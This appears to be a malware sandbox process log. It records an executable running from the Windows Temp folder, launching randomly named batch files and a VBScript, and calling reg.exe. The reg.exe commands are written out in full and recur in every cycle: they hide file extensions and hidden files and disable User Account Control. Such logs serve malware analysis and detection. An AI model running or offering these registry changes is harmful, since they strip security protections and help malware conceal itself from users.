cmd /c ""C:\Users\Admin\AppData\Local\Temp\KAUsUskY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jOwoMkAg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VWYIsEwE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PGAIUsQM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-440999511-1155300936181164591210668703835374953-1370716411-1392040357-1182375777"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UKowIkEI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\aIocUkYY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1531978821-170153260441454644-1568343422-234136477-1549663008-17192498081069427790"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wKsYMUQM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iUwgcAAk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-562610642-1012686143-1823529821627534025573683888937657951109441090-1434522835"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VQMMUUII.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1684412327-76320201816065152608441403622103630331205356645569190144611771160"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-4434012343984981381663635953966065408187333917174603648320520853211795173721"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\FmgcYowI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "14838520339525129391306933750-15531957801929914349-14278369881917251631-1761057869"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BOQsEoMs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "989972481691039484-1439563656-17970014547512975433404416981966436671-1960887852"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vMgMkAkY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-116314391292071513-963266584164256776018708505581588814441144782848-1730487192"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1577704050-1683544744-770769748616314146131678904120556107641232260824-4495685"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iUIkwQEo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ciMAkcYk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\kegggQos.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-889792155-22352944-14318574521849549300-193098601418762819564400872771662604915"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IyoskIMI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\nEUYEcYY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-8356572851737083676-553080150-865838722-289085357-6554794141125087206-2096936540"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\biAAosIo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-175029257-494530956-1689006027-111651272-12534062191834863706-1643781308-829071450"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\DQscwMMA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JkssYwgQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "59999687420859386711794014904878821408-8654199651125802841-947256953-1149455641"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-239290127294818250-591828114-1199054742-16170107712127489858-530367467862633738"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\uSMcYowI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "5231830861206300148296010046123737901692976290-103152939-1186453371-1195890439"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

